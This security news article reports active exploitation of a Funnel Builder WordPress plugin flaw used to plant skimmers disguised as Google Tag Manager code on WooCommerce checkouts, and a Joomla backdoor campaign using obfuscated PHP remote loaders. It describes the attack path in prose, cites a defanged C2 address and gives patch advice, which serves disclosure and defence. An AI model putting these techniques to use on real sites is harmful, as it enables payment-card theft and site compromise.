### Active Exploitation of Funnel Builder Plugin A critical security vulnerability impacting the **Funnel Builder** plugin for WordPress has come under active exploitation in the wild to inject malicious JavaScript code into WooCommerce checkout pages. The objective is to steal payment data. Details of the activity were published by **Sansec** this week. The vulnerability currently does not have an official **CVE** identifier. It affects all versions of the plugin before 3.15.0.3 and impacts over 40,000 WooCommerce stores. ### Unauthenticated JavaScript Injection The flaw allows unauthenticated attackers to inject arbitrary JavaScript into every checkout page on the store, according to the Dutch e-commerce security company. **FunnelKit**, which maintains Funnel Builder, has released a patch for the vulnerability in version 3.15.0.3. "Attackers are planting fake **Google Tag Manager** scripts into the plugin's 'External Scripts' setting," **Sansec** noted. "The injected code looks like ordinary analytics next to the store's real tags, but loads a payment skimmer that steals credit card numbers, CVVs, and billing addresses from checkout." ### Technical Details of the Vulnerability According to **Sansec**, Funnel Builder includes a publicly exposed checkout endpoint that allows an incoming request to choose the type of internal method to run. However, older versions were designed such that they never checked the caller's permissions or limited which methods are allowed to be invoked. Attackers exploit this loophole by issuing an unauthenticated request that can reach an unspecified internal method. This method writes attacker-controlled data directly into the plugin's global settings. The added code snippet is then injected into every Funnel Builder checkout page. As a result, an attacker can plant a malicious `<script>` tag that's triggered on every checkout transaction in a susceptible WordPress site. ### Skimmer Implementation In at least one case, **Sansec** observed a payload masquerading as a **Google Tag Manager** (GTM) loader to launch JavaScript hosted on a remote domain. It subsequently opens a WebSocket connection to the attacker's command-and-control (C2) server (`wss://protect-wss[.]com/ws`) to retrieve a skimmer that's tailored to the victim's storefront. The ultimate goal of the attack is to siphon credit card numbers, CVVs, billing addresses, and other personal information entered by site visitors at checkout. Site owners are advised to update the Funnel Builder plugin to the latest version and review `Settings > Checkout > External Scripts` for anything unfamiliar, removing any suspicious entries. "Dressing skimmers up as Google Analytics or Tag Manager code is a recurring Magecart pattern, since reviewers tend to skim straight past anything that looks like a familiar tracking tag," **Sansec** said. ### Joomla Backdoor Campaign The disclosure comes weeks after **Sucuri** detailed a campaign in which Joomla websites are being backdoored with heavily obfuscated PHP code. This code contacts attacker-controlled C2 servers, receives and processes instructions sent by the operators, and serves spammy content to visitors and search engines without the site owner's knowledge. The ultimate aim is to leverage the sites' reputation for injecting spam. "The script acts as a remote loader," security researcher Puja Srivastava said. "It contacts an external server, sends information about the infected website, and waits for instructions. The response from the remote server determines what content the infected site should serve." "This approach allows attackers to change the behavior of the compromised website at any time without modifying the local files again. The attacker can inject spam product links, redirect visitors, or display malicious pages dynamically."